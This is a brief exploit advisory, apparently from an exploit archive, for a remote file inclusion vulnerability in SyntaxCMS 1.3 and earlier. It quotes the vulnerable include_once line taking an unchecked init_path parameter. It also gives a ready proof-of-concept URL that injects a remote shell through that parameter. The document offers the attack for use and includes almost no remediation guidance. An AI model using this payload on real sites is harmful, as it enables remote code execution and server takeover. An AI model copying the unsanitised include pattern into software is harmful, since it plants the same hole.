############################################################### ## SyntaxCMS <= 1.3 Remote File Include Exploit ## ############################################################### ############################################################### ## Discovered: cr4wl3r ## Download: ## Date: 13.02.2010 ## Remote: yes ############################################################### ############################################################### Vuln : [SyntaxCMS_path]/public/admin/testing/tests/0004_init_urls.php include_once( $init_path . '/init.urls.php' ); ############################################################### ############################################################### PoC : [SyntaxCMS_path]/admin/testing/tests/0004_init_urls.php?init_path=[Shell] ############################################################### ############################################################### ## GreetZ : myself ###############################################################